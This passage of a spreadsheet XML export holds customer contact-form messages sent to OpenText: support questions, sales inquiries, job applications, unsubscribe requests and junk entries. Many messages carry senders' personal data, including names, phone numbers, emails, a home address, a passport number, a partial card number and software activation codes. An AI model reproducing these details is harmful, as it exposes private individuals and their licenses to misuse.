4. OpenText Exceed OnDemand x 10_x000D_
_x000D_
Jessy</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madame,_x000D_
_x000D_
I'm Jichan Jo who works at Security Solution Team, ADT Caps._x000D_
_x000D_
We have priodical preventive maintenance contract with Johnson Controls for Opentext Korea. However we are not possible to check security PIC in OpenText._x000D_
_x000D_
So, would you like to inform us security PIC's contact detail both S.Korea and Global? _x000D_
When I receive thier contact detail, I will arrange visit and inspection schedule with them._x000D_
_x000D_
if you haveany inquiry, don't hesitate to contact me._x000D_
(Office: +82 2 3485 9089 // Mobil: +82 10 9950 3058 // Email: jcjo2@adt.co.kr)_x000D_
_x000D_
_x000D_
Best regards._x000D_
Jichan Jo_x000D_
</t>
  </si>
  <si>
    <t>Please remove me from your email list.  Your unsubscribe form DOES NOT WORK...tired of all the emails_x000D_
Thanks</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am looking into the current career opportunities..  Is there a pay grade or job banding that roles are fit into?  If so, is this available to me please?  How do I determine the salary for any given posting?</t>
  </si>
  <si>
    <t>I would like to update our version of Encase to the latest version.  The administrator for the account is out on medical leave and I am overtaking his duties.  What do I need to do to update our version?</t>
  </si>
  <si>
    <t>I'm interested in upgrading several EI dongles to v8.X per (I believe) existing paid contract. Can you please let me know what information is needed to begin this process?_x000D_
_x000D_
Best,_x000D_
Jonathan K.</t>
  </si>
  <si>
    <t xml:space="preserve">We are working on identifying the integration of below stated scenario. _x000D_
--&gt; Integration of Outlook mail box with SAP inbox to forward open text vendors emails and their attachments. _x000D_
Would you please provide us documentations, guides and procedural scripts if there is any possibility from open text side. </t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
Wildflower is interested in reselling OpenText products to DHS agencies through our FirstSource II contract vehicles (we are a prime on both the HUBZone and Small Business contracts). We would like information on how to become authorized resellers, what channels to go through, how to qualify for deal registration etc. _x000D_
_x000D_
Thank you in advance._x000D_
_x000D_
Best Regards,_x000D_
Justin</t>
  </si>
  <si>
    <t>Write a business plan</t>
  </si>
  <si>
    <t>I would like to have information about pricing for rightfax.  We are sending and receiving about 15 fax / month and as we are soon moving we are currently looking at options for fax capabilities.</t>
  </si>
  <si>
    <t>our brava reader isn't working. it keeps saying we are having a license problem even though we have been paying every month. please call me if you would like 519 747 3970 ext 230</t>
  </si>
  <si>
    <t>Thank you for sending your catalogue.  Although you have great products, I realize that since my retirement several years ago, I have started throwing the catalogue away without even looking through it.  In the interest of saving you some postage and not wasting resources to print my catalogue, I request that you remove me from your distribution list._x000D_
Nancy Easterling_x000D_
2108 Diamond Oaks Rd_x000D_
Stephenville, Texas 76401</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, We are using teamsite to display the content on our website.Every monday we are receiving expiration email notifications.These come out every Monday, for any files expiring prior to a date two weeks in the future, and are sent to the Content Steward.Can you help us on turning off this notifications._x000D_
</t>
  </si>
  <si>
    <t>je úžasný Samоⱬřejmoṣṭí jе i ɗoрoṛučоṿảní nejḅlіžsícḥ ṛestaꭒrací, hoṭelů ṇеbо ⱬaṣṭảvек мĕṣtské ḥromaɗṇe dорraṿy.</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently using 4.0.106 live editor and would like to know what the lasted version to move to.  Also I am new to live editor, is there any training you can provide?  </t>
  </si>
  <si>
    <t>I cannot reset my password to log into my account.  It errors telling me that my email address is not a registered email.  My account number is 865859.</t>
  </si>
  <si>
    <t>I have Exstream Version 8.0.325 64-bit (MSMQConnector) running in Windows 2008.  Is this version supported for Windows 2012 and Windows 2016.</t>
  </si>
  <si>
    <t>I have been paying for Hightail Pro for several years now._x000D_
I am now finding that I have no use for Hightail Pro as my files are smaller and the speed and capacity of servers has increased._x000D_
I am hereby requesting that you stop billing my credit card (****3575) monthly and remove me from the program._x000D_
Please let me know if there is any more information you need and/or what I need to do at my end to proceed with this matter._x000D_
_x000D_
I appreciate your service over the years._x000D_
Kindest regards,_x000D_
Gord Maxwell</t>
  </si>
  <si>
    <t>Can you provide me with a work flow of how teleform works. Does the software send any scanned images to the cloud?</t>
  </si>
  <si>
    <t>Having issues with allocation of resources. I am currently running EnCase and I am trying to figure out what needs to be configured for the software to take a bigger piece of the pie to speed things along.</t>
  </si>
  <si>
    <t>I have attempted numerous times to speak to someone and get assistance with signing up for this program and use our current fax number. I have yet to hear from anyone via email and was cut off numerous times via phone. If I could get some assistance with this, that would be great. I look forward to hearing from you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hey!_x000D_
_x000D_
My name is Vlad, and I’m a computer engineering student at the University of Ottawa. I’m really interested in your company, and I was wondering if there’s space this summer for an internship. I love to learn, and I would love to get foot into the software industry. I have experience and projects in this area. I can provide any information that is needed, and if there is a spot or a need for an intern this summer, I’d love to fill that position!_x000D_
_x000D_
Thanks,_x000D_
Vlad_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is Patrick Ochoa, Director of Business Development at Examity the leader in online exam proctoring and authentication. I am curious if Open Text would be interested in exploring online proctoring as an alternative to your current testing methods? _x000D_
_x000D_
If interested, I can set up a brief call to introduce Examity and how we could add value to OpenText. _x000D_
_x000D_
Kind Regards_x000D_
Patrick</t>
  </si>
  <si>
    <t>I am not able to login to the EnCase Support site.  The site keeps stating it has encountered a problem.  We have 17 EnCase Forensic dongles/licenses that are current.  One of our licenses is G3002085017</t>
  </si>
  <si>
    <t xml:space="preserve">We received a charge in our bank account.  As I am trying to find support, we found out the person who set this up for our company is no longer here and we do not have access.  The original Contact was Julie Sehrt and the AP contact was Holly Rapken - both are no longer with our organization.  Can you please let me know what we need to do to update the records and review the services?_x000D_
_x000D_
Thank you_x000D_
Natasha Tandeski_x000D_
Zubie, Inc._x000D_
Director, Finance Operations_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I have a couple of users that are having issues with the DM add in for Outlook.  Every time they close Outlook and reopen it, they are having to manually re-enable the Dm add in.  They are running eDOCSDM 16.4 and are using Outlook 2016.  I have re-installed both pieces of software and the issue is still present.</t>
  </si>
  <si>
    <t>I have BOQ for opentext renewal . Could you please refer me your authorized partner in Saudi Arabia._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello - we are exploring document management software and your enterprise content management solution was suggested to us as something to look into. I would be interested in speaking with someone to give a high level overview of what we are trying to accomplish short term and from a long term goal standpoint to see if there is a fit with your software given our current systems and tools. I can be reached by email at dmeyer@magnetrol.com or by phone at 630-969-4000 x6642_x000D_
_x000D_
Thanks in advance._x000D_
_x000D_
Darren Meyer_x000D_
Director - Factory Sales_x000D_
Magnetrol International </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I would like to get intouch with someone that can provide more informarion on your enterprise document management system offering?_x000D_
_x000D_
Thanks,_x000D_
Wesley_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I have some problems downloading encase from the support site. Can you please check my account? My cm stick is G3002095043,_x000D_
_x000D_
Thank you in advance._x000D_
_x000D_
Andre Siraa</t>
  </si>
  <si>
    <t xml:space="preserve">Almatis recently (end of Dec'18) purchased licensed for SAP VIM, OCR and Archiving solutions. The purchase has been done through SAP not OpenText directly._x000D_
How could we receive an access to support page, -  in particular, to products documentation please?_x000D_
_x000D_
Thanks and Best Regards,_x000D_
Vlad Lavysh_x000D_
</t>
  </si>
  <si>
    <t>Hello to you. I would like to know if I am eligible for you Virtual Classroom training "DF220 - Navigating EnCase Version 8" on May 7th, 2019? I already have previous trainings with "Guidance Software", 1) Nov 2001, 2) Nov 2009, 3) Sept 2014. I have the certificats for courses 1 and 2, but none was issued on Sept 2014. If I am eligible, I will register for the above mentionned course. Thank you. I could send you copies of my certificats, if needed. I am working at the moment with version 8, but like to know more.</t>
  </si>
  <si>
    <t>We are in the process of evaluating several enterprise ETL solutions. Our immediate need is just a list of the main features that Integration Center has to offer to use for comparison to other tools. Beyond that I do have a few specific questions.	_x000D_
	_x000D_
•	Does Integration Center allow you to trigger (and pass arguments to) another ETL job (or stored procedure possibly) that exists in a separate database?_x000D_
•	Does Integration Center achieve database agnostic behavior exclusively by emitting Java “under the hood”? Or does it ever emit database-specific script?_x000D_
	_x000D_
Regards,	_x000D_
--Ross</t>
  </si>
  <si>
    <t>Hello,_x000D_
I'm a college student interested in serving as an intern for OpenText. If possible, I would appreciate an email address or alternate form of contact through which I could send my resume.</t>
  </si>
  <si>
    <t>can you please provide confirmation that the new version of Rightfax connector will install on an Exchange 2016/Windows 2016 server?</t>
  </si>
  <si>
    <t>Hi, I bought Teleform elite in 1998. It was property of Cardiff and I bought it through a French company named  Mimetics which does not exist anymore. I would like to get the latest version as an upgrade but do not find back my S.N. nor the disketts (3´1/2!). Do you have my references and what would be the price. My University pays 45 days after réception. Do you work with these terms ?_x000D_
Best regards,_x000D_
Roland</t>
  </si>
  <si>
    <t>Please, I am having problems when I want to register an account for the client Southern Perú. I don't know what information should I enter from the Packing Slip document.</t>
  </si>
  <si>
    <t>My Corporate Team supports partially GCDOCS. _x000D_
They do not install GCDOCS on servers._x000D_
They do not manage the application Server side._x000D_
They do however have to learn active views, the api and internal system admin functions._x000D_
_x000D_
could i have a quote or at least a list of the required training?</t>
  </si>
  <si>
    <t xml:space="preserve">Dear,_x000D_
_x000D_
I'm writting to you because I'm looking for an Outpout Management solution to propose to a client of mine. _x000D_
_x000D_
In fact, we are about to start a new implementation of Cloud based CRM part or the SAP C/4HANA suite (previously called SAP Hybris Suite). We are wondering if your solution could connect to this CRM? _x000D_
_x000D_
Could you please provide some information/documentation on the process or how to achieve it?_x000D_
_x000D_
Thank you in advance._x000D_
_x000D_
I'm looking forward to hearing from you soon._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Giuseppe Montagnino _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I will need further assistance with the IT and computer and software development </t>
  </si>
  <si>
    <t>I sent email to renewal my Ence certification. but i haven't gotten reply yet. could you check my email?_x000D_
thank you</t>
  </si>
  <si>
    <t>Hello, I can't access to the support page. The page says i need to verify the email but after the succesfull verification i can't go further._x000D_
Thanks</t>
  </si>
  <si>
    <t>I need the new license key for my Imagelink product.the invoice was paid. I am not in the office so please communicate with email.</t>
  </si>
  <si>
    <t>I received a purchasing request for training on Encase DF120.  Are you the only place to get this training or do you have partners/resellers who also provide this service?  Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">We had implemented BCC in Kimberly Clark Latin America, and need support in development system. </t>
  </si>
  <si>
    <t xml:space="preserve">Daybreak Venture is looking into upgrading their hardware to a Power 9. Model: 9009-41A, Processor Feature: EP10 (1 active processor) and Processor Group: P05.  What would be the upgrade cost for your software? Thank you, Jeff_x000D_
</t>
  </si>
  <si>
    <t>Hello, _x000D_
I have created an account based on e-mail adress: suleyman.bulus@itelligence.com.tr_x000D_
When I login to my account, I cannot access any site related to opentext. It is written "Server error" on the page. Is there something wrong with my account? What should I do?</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning, _x000D_
_x000D_
I chatted with Evgenia Olshanskaja this morning regarding your products. I work in the Project Controls dept for the MNAA.  I am just shopping around right now for a document database/software with excellent version control and organization for our department.  We currently use Microsoft Office 365.   _x000D_
_x000D_
Below are a few details on what we are looking for:_x000D_
•	Our documents are mostly textual documents_x000D_
•	Required to be Exportable to Word &amp; Excel _x000D_
•	OCR Search options_x000D_
•	Topic and subtopic management – version control at a topic and subtopic level_x000D_
•	Tracking and transparency on editing of documents_x000D_
•	Is it possible to have sub article options tailored for specific types of contracts? Design &amp; Build contracts? _x000D_
•	Security measures_x000D_
•	Only 5 licenses needed at this time_x000D_
_x000D_
Could you please provide me with information on a product that would best suit our needs based on the bullet points provided, above?_x000D_
_x000D_
Thank you!_x000D_
Brianna LeMaster_x000D_
</t>
  </si>
  <si>
    <t>We are currently receiving emails from Opentext regarding a soft error we have with an EDI arrangement. Although we are looking into this error with Aldi (your client), we are concerned that we received this email (and all others sent) into our quarantine area on our email system. Having checked the head of the emails you are sending, there appears to be neither any SPF data nor any DKIM data and thus your emails are classed as junk mail._x000D_
_x000D_
Please can you pass this onto the relevant department within your organisation so we can eliminate this issue._x000D_
_x000D_
Many thanks,_x000D_
_x000D_
Mike Williams</t>
  </si>
  <si>
    <t xml:space="preserve">I have been unable to get a response from your team.  Please see below._x000D_
_x000D_
I wish to escalate this to the UK Chairman or MD._x000D_
_x000D_
Hello Steve_x000D_
_x000D_
Still no response from you._x000D_
_x000D_
Regards_x000D_
_x000D_
Darren_x000D_
_x000D_
 _x000D_
_x000D_
Darren Lloyd_x000D_
CEO   Owner_x000D_
_x000D_
 _x000D_
m:	 07803022875_x000D_
_x000D_
t:	 0117 916 5600 ext. 5615  _x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
 _x000D_
_x000D_
 _x000D_
From: Darren Lloyd _x000D_
Sent: 22 January 2019 08:40_x000D_
To: smckenna@opentext.com_x000D_
Cc: John Smith &lt;j.smith@united-uk.com&gt;; Graham Bourton &lt;g.bourton@united-uk.com&gt;_x000D_
Subject: RE: United Dispute_x000D_
_x000D_
Hello Steve_x000D_
_x000D_
I’ve had no reply to my email._x000D_
_x000D_
Please can you reply by Thursday of this week._x000D_
_x000D_
Regards_x000D_
_x000D_
Darren_x000D_
_x000D_
 _x000D_
_x000D_
Darren Lloyd_x000D_
CEO   Owner_x000D_
_x000D_
 _x000D_
m:	 07803022875_x000D_
_x000D_
t:	 0117 916 5600 ext. 5615  _x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
 _x000D_
_x000D_
 _x000D_
From: Darren Lloyd _x000D_
Sent: 14 January 2019 08:09_x000D_
To: smckenna@opentext.com_x000D_
Cc: John Smith &lt;J.Smith@united-uk.com&gt;_x000D_
Subject: United Dispute_x000D_
_x000D_
Good morning Steve_x000D_
_x000D_
I have been briefed by my colleague John Smith and United seem to be “falling” into a dispute with your business._x000D_
_x000D_
To avoid any unnecessary action, could you please brief your Managing Director how this has happened._x000D_
_x000D_
Furthermore, could you please provide me your MD’s details and I will make contact tomorrow._x000D_
_x000D_
Regards_x000D_
_x000D_
Darren_x000D_
 _x000D_
_x000D_
Darren Lloyd_x000D_
CEO   Owner_x000D_
_x000D_
 _x000D_
m:	 07803022875_x000D_
_x000D_
t:	 0117 916 5600 ext. 5615  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>It indicates that I always insert an incorrect code, but  I have not changed it since last time I was logged in</t>
  </si>
  <si>
    <t>Right djfjckfjf</t>
  </si>
  <si>
    <t xml:space="preserve">We are making travel plans for this conference and need to know the agenda for March 12th if we are not attending the training. </t>
  </si>
  <si>
    <t>URGENT - _x000D_
Can you confirm my booking for the EnCase NTFS course at Reading on January 29th 2019?_x000D_
I thought I had booked this earlier but realised that I have no notification emails about it.</t>
  </si>
  <si>
    <t>Social Security Commission would like to download the latest upgrade for WorkDesk (Execute360 Client Release 10) which is compatible with Windows 8 and 10 as we are curently running Execute360 Client Release 10 which were meant for Windows 7</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for RightFax solution offering from open text, which can be integrated to Telephony or Contact Center environment. </t>
  </si>
  <si>
    <t>Wir sind eine IT Dienstleister im Raum Frankfurt und interessiert an einer Partnerschaft._x000D_
Besten Dank vorab.</t>
  </si>
  <si>
    <t xml:space="preserve">I need to prepare the budget for documents for KTB/KTBCS .Could you pls help ask your sales rep. send e-mail / contact me </t>
  </si>
  <si>
    <t>We have bought in te past several Centura products (starting even with the sqlWindows 4!!)._x000D_
I want to reinstall centura 3.1 with ptf 4, which I was able to do. But I can not register the software (even tho we have bought 2 of those, and also 2 of ctd 2005.1). _x000D_
The point is that I need the c3.1 ptf4 working and not complaining about the days left use the software. Can you please give me my key?_x000D_
My media/CD Code PMC = 081CB6F6 EE1ED03A 0C193444 7EF1786A_x000D_
Activation code: 88E7ACAD 66DF8CC6 F64EB9F8 866CF1D1_x000D_
Please answer me back or tell me what I can do to get this working._x000D_
There are only 42 days left to get this thing registered.._x000D_
_x000D_
Mike Dijkema_x000D_
University off Groningen_x000D_
The Netherlands_x000D_
tel: +31 50 3639372</t>
  </si>
  <si>
    <t xml:space="preserve">Is there any vacancy for mtech? </t>
  </si>
  <si>
    <t>I have encase 8, and have couple question on performance and operation manual._x000D_
When I create a case, I wonder about how to set case and cache directory location._x000D_
Also Encase 8 fails to process evidence by saying "Job failed: Encase running the evidence processor unexpectedly terminated"._x000D_
_x000D_
Please help us with the issue.</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for an EDI service provider for trading with Ace Hardware. </t>
  </si>
  <si>
    <t>Hi I need the company that will work with my company,as I'm doing business consulting from the shop owners,im willing to get more information about business consulting if there is any application forms feel free to send it back on my email thanks.</t>
  </si>
  <si>
    <t>Snns</t>
  </si>
  <si>
    <t>usaxingshang@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">I have a link that no longer works for a video sent to me by a client of yours Claude Levet. He died a few months ago and I was trying to get a copy of a video he made for my son’s wedding. I have the hightail link number. Is there any way I could get a copy from you? </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are evaluating different packages for one of our SAP client for A/P automation_x000D_
with OCR and workflow functionality with _x000D_
    - Scanning_x000D_
    - Archival_x000D_
    - Workflow_x000D_
    - portal_x000D_
    - Email invoice receipt_x000D_
    - Validation of invoices with 3-way match_x000D_
Please let me know more details on the solution that fits minimum of these requirements._x000D_
_x000D_
Once we have few details about functionality, would be pursuing further for additional discussions._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Milind</t>
  </si>
  <si>
    <t>Hi, could I get quotations on the following licenses, site licenses, perpetual licenses and term based lincensing. This is for the Encase Forensic software and I would require 4 licenses. Thanks</t>
  </si>
  <si>
    <t>I am an fulltime employee at Opentext. I am trying to enroll my self in course 2-6101 Working with Report Designer. However I am getting any discount and it is asking for full payment. Should this course not be free for OpenText Employees.</t>
  </si>
  <si>
    <t>VAN Setup_x000D_
- PISTON Account : 12/081013490_x000D_
- Harley Davison Account : ZZ/062629324HDT, 01/062629324</t>
  </si>
  <si>
    <t>Hi,_x000D_
I work for Information Leadership, an Information Management organisation that specialises in Office 365. We were named the Microsoft Partner of the year 2017 for Government and are a currently a charter partner in Microsoft's Content Services Partner Program._x000D_
_x000D_
We are currently working with a group of New Zealand government agencies to determine how best to align the collaboration capabilities of Office 365 with the ECM capabilities of OpenText._x000D_
_x000D_
I'd like to speak to someone from OpenText who can explain in detail how your current SharePoint integration functions, search capabilities from SharePoint across OpenText content and alignment or integration with Office 365 for collaborative purposes._x000D_
_x000D_
My phone number is +6421588501. _x000D_
_x000D_
Thanks in advance,_x000D_
_x000D_
Greg Jack_x000D_
Senior Consultant_x000D_
Information Leadership</t>
  </si>
  <si>
    <t>VAN setup_x000D_
- Piston Van Buren qualifier is 12 and the ID is 081013490</t>
  </si>
  <si>
    <t xml:space="preserve">Trying to attend Enfuse from the Netherlands. Because of budget estimation, what are the costs to attend Enfuse?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Consultor sap procuro oportunidades </t>
  </si>
  <si>
    <t>I have a web  based easylink account.   I am able to send faxes from email.  how do I send using the Print2Fax?  When I enter my email address or my fax number and my 6 digit security code, I get a dialog "Credentials Not Validated. Please correct"</t>
  </si>
  <si>
    <t>I'm a former employee and I did not receive my W-2. Where can I procure it?</t>
  </si>
  <si>
    <t>LK</t>
  </si>
  <si>
    <t xml:space="preserve">Fhhv dry sty e3yufs </t>
  </si>
  <si>
    <t>Unemployed</t>
  </si>
  <si>
    <t>Dear sir/ Madam hope all is well my name is Sergio Martins i am 21 years old looking for work. I have my Matric and i have 1 year in IT from Damelin randburg. I am a hard worker I always like to please and benefit the company! I like to work organized and efficiently. I have my own car too so transport is no issue. Thank you for reading my email please do let me know of any opportunities that arise or that are open! Id much appreciate it!</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
_x000D_
I need to get licence for EDMS only for 10,000 Users._x000D_
_x000D_
Can i please working with you direct incited of the  agent in Dubai._x000D_
_x000D_
Please do not inform the again in dubai._x000D_
I inform him to working with IBM product.  _x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team,_x000D_
I am trying to book  my first training for 5th March 2019  My passport no  is 9000907188. the system did not allow me on your website, please l will need help how to go about. _x000D_
Thank you_x000D_
Felix Taiwo  </t>
  </si>
  <si>
    <t>Hayker</t>
  </si>
  <si>
    <t>Greetings to concern authority_x000D_
  I would like To put in all the Experiences and abilities learnt &amp; acquired throughout my career and work sincerely and effectively for the benefit of the organization where my capabilities and experience can widen and I grow parallel to the company.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am the Apple Enterprise AE supporting our mutual client Amgen. _x000D_
_x000D_
I understand that Amgen's version of Documentum does not work on macOS and as such wish to connect with the OpenText/Documentum AE to understand which version the client is using and if there is a cloud-based, OS-agnostic, solution that can be used instead. _x000D_
_x000D_
Many thanks for the introduction to my OpenText/Documentum counterpart supporting Amgen, California._x000D_
_x000D_
Many thanks,_x000D_
_x000D_
Nick</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
I would like to download Encase imager and I could not find it on your site. Could you be so kind to send me the link from where I can download it?_x000D_
_x000D_
Many thanks in advance,_x000D_
_x000D_
Aurelian VASILE</t>
  </si>
  <si>
    <t>Dear Madam/Sir,_x000D_
_x000D_
Today, I received the mail (with subject of "OpenText - Job ID: 21121 - Senior Software Developer") from OpenText Careers which says that you decided to pursue other candidates. Although I applied for some positions at OpenText, I did not applied for Job ID: 21121 and this job position does not exist in positions I have applied to (in my career profile). I wasn’t supposed to get this email. It looks like it was sent me by mistake. _x000D_
I just letting you know so you can send it on to the right recipients (or correct me if I misunderstood or it is for other positions)._x000D_
_x000D_
Kind regards,</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon could you help me with the link of Brava 16.4_x000D_
I have a license but I require the software._x000D_
_x000D_
regards._x000D_
</t>
  </si>
  <si>
    <t>_x000D_
I need to download the brava 16.4 could you send me the link please-_x000D_
_x000D_
I have a license but I require the software</t>
  </si>
  <si>
    <t>_x000D_
I need to download the brava 16.4 could you send me the link_x000D_
please.</t>
  </si>
  <si>
    <t>AI</t>
  </si>
  <si>
    <t xml:space="preserve">Dear people of OpenText, _x000D_
_x000D_
Please can you tell me who to contact about the technique you acquired in 2016 from HP: HP Reveal/Aurasma. I hope this person can tell me whether this technique / service will be available via Open Text this year. Also, I want to know whether the technique will be affordable for small non-profit organisations, such as small museums. _x000D_
_x000D_
Thanks in advance and looking forward to your reaction,_x000D_
_x000D_
Trudy van Rooij _x000D_
TrudyTekst_x000D_
The Netherlands_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are based in Qatar, we have internal expertise in CMS, could you provide us partnership for OPENTEXT</t>
  </si>
  <si>
    <t>Jakc</t>
  </si>
  <si>
    <t>Money</t>
  </si>
  <si>
    <t>Isuhd</t>
  </si>
  <si>
    <t>I requested a free trial of your software for 14 days today._x000D_
I still havn't used it even once, and request you to please cancel it._x000D_
( unless you give a special veteran discount, i am an individual person, and not a company or business man ). Thanx, bye.</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to inquire if you have an insurance solution. Please advise. </t>
  </si>
  <si>
    <t>I received a file through this service and let it expire.  Is there any way to get it again if the original sender is being uncooperative?</t>
  </si>
  <si>
    <t>Hi,_x000D_
I've been tasked with re-evaluating our RightFax build/support structure. Right now we work via OneTouch Global and we're curious about other support and billing models. We're also in need of an upgrade - we're at version 10 and looking into the benefits of moving to 16 and other connection types than our T1 lines. We've also been struggling to provide good reporting from what we have currently - we'd like stats around processing time, number of faxes by RightFax user/account, pages sent, etc._x000D_
Is this something we could set up a call about, or a more direct email method?_x000D_
Thanks!_x000D_
-John Bear</t>
  </si>
  <si>
    <t>Nike is looking for a DAM to manage our marketing assets, and I'd like to schedule a demo of your solution to see what it offers.</t>
  </si>
  <si>
    <t xml:space="preserve">What happened to my user account._x000D_
Asked for a password reset and i get no return._x000D_
</t>
  </si>
  <si>
    <t>I purchased the Brava Desktop for $49. 4/22/2016._x000D_
Can I upgrade to the TXL version? _x000D_
I want to be able to add comments to a PDF. _x000D_
Or do I have to purchase a new license at the full price of $115?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
My name is Ferry and I am looking for cloud base Fax system. Could you please send me an email with your price list. My email address is Ferry.Yoesup@waldorfastoria.com. Also do you have any other Hilton properties that is using your service? Thank you._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Ferry</t>
  </si>
  <si>
    <t>Hi there,_x000D_
I'm looking to apply to a job via the OpenText website, and it will not allow me to sign in. I've created an account already, but it will not let me sign in - which I need to do to apply for the job. When I try to just create a new account in won't allow me because it says my email has already been used (by me) for another account. When I try to change my password it asks for my email, which I type in, but I never receive the email to change my password.  I've tried this a number of times now yesterday and today and nothing seems to work.  Is there anything you can suggest so that I might apply for this job? Or is there any other way to apply for positions other than via an account?_x000D_
Thanks in advance for your help._x000D_
-Will Fast</t>
  </si>
  <si>
    <t xml:space="preserve">Is your product compatible with Avaya Aura Contact Center? </t>
  </si>
  <si>
    <t xml:space="preserve">I noticed you had a vendor invoice management solution. I was interested if you have an invoice management solution for the AR side as well. </t>
  </si>
  <si>
    <t>I would like access to the knowledge base</t>
  </si>
  <si>
    <t xml:space="preserve">The employee who was in charge of our catalog UPC creation no longer works with the company and we need to reset the password and email access. Can you please change the email for R7149 R7149A to liana@anticaf.com so we can change this? Thank you! </t>
  </si>
  <si>
    <t>We need a solution for scanning a lot of financial docs with automation.</t>
  </si>
  <si>
    <t>I am in the process of registering for the Open Text StreamServe/SAP Document Presentment Bootcamp class on 2/25/2019.  My company always pays for our training courses via Purchase Orders.  Question: _x000D_
_x000D_
May you please send me the Contact Information to be listed in the Purchase Order?  My Purchasing Dept. issued the PO to SAP Public Services, but they are not sure.  With requisitions they need to know the vendor's name and complete contact information.  _x000D_
 _x000D_
Please advise.  _x000D_
_x000D_
Thank you advance for your assistance with this matter.  _x000D_
_x000D_
Anna Bennett _x000D_
402-504-0829</t>
  </si>
  <si>
    <t>Info</t>
  </si>
  <si>
    <t>Belk is doing research to determine if implementing a DAM can improve processing time of product images for Belk dot com. I would like to learn about your offerings to determine they would improve our workflow._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Michael Denny</t>
  </si>
  <si>
    <t xml:space="preserve">My name is Mark Valeriani and I am a computer science major at St. John Fisher College in Rochester NY. I live in New Jersey and was wondering if opentext had any internship opportunities for this Summer. If there are any opportunities available could you please contact me at either markdvaleriani@gmail.com or my cell phone number at 609-705-3230. Thank you,_x000D_
Mark Valeriani </t>
  </si>
  <si>
    <t>This is a test from my iPad.</t>
  </si>
  <si>
    <t>testing</t>
  </si>
  <si>
    <t>This is another test. Hi Tom :)</t>
  </si>
  <si>
    <t>Just testing</t>
  </si>
  <si>
    <t>This is a test.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello My name is Peter Wartmark Peterwx7@gmail.com. 818-268-8487._x000D_
I have an account with you that I have had for 15 years. Now all of a sudden I can not_x000D_
Log in to my account and access my files they are not there all I am getting is an empty Hightail account._x000D_
This happened once before I sign in with my google mail and I changed the password there a few times and after I could not log into Hightail and access my files anymore. A tech person from Hightail helped me getting them back. And I need help with  getting my files back again. I am very happy with your service you have always been very helpful. This is very urgent to me since I need to send some files out ASAP. Can you please help me and respond as soon as possible._x000D_
Thank You_x000D_
Peter Wartmark_x000D_
my previous emails with you was peterxxx7@gmail.com and peter@shamelesspictures.net those emails are no longer valid and I can not access them my new email is peterwx7@gmail.com_x000D_
Thanks for your help._x000D_
</t>
  </si>
  <si>
    <t>Help</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
Where or How can I find some technical documentation about OpenText ECM installation guide, system requirements and ingration with SAP HANA?_x000D_
_x000D_
Cheers.</t>
  </si>
  <si>
    <t>Can you please provide me with a valid email address to send Purchase Orders.  I called yesterday and spoke to someone and they advised me to send Purchase Orders to BILLING@OPENTEXT.COM.  When I tried sending to that email address it was failed delivery.</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
_x000D_
My name is Talita Veiga. I`m an advanced diploma Supply Chain and Operations Management co-op student at Conestoga College and I am writing to you hoping that you might be willing to let me spend a day shadowing so I can learn more about the supply chain and operations on a day-to-day basis. _x000D_
_x000D_
This is an initiative of the school, called Industry Awareness Day and I am looking forward to having this live work experience. _x000D_
 _x000D_
If you are open to it, it would help me greatly to be able to quietly observe you and the company`s activities for a half- or full-day as you go about your usual schedule. _x000D_
_x000D_
Thank you so much for considering my request. Please, let me know if I can call you next week to see about scheduling the job shadowing. If you have any questions or concerns, please feel free to contact me via phone (226-808-6401) or via email (veigatd@gmail.com)._x000D_
_x000D_
Thank you for your time and consideration._x000D_
_x000D_
Sincerely, _x000D_
Talita Veiga_x000D_
Supply Chain and Operations Management Advanced Diploma – Year 1_x000D_
Conestoga College_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are upgrading the servers and want to know if the Xenos product is compatible with the new environment.</t>
  </si>
  <si>
    <t>I need an Accounts receivables contact.  we are updating our system</t>
  </si>
  <si>
    <t>Dear Sirs_x000D_
_x000D_
I have been looking into your product, however I have some questions in regards to it and would like to discuss theses.</t>
  </si>
  <si>
    <t>The bksrvr service does not start normally after the Oracle and OpenText update</t>
  </si>
  <si>
    <t>Tenemos un problema con la actualización de la herramienta</t>
  </si>
  <si>
    <t xml:space="preserve">AP automation - OCR - Workflow across SAP and Oracle systems </t>
  </si>
  <si>
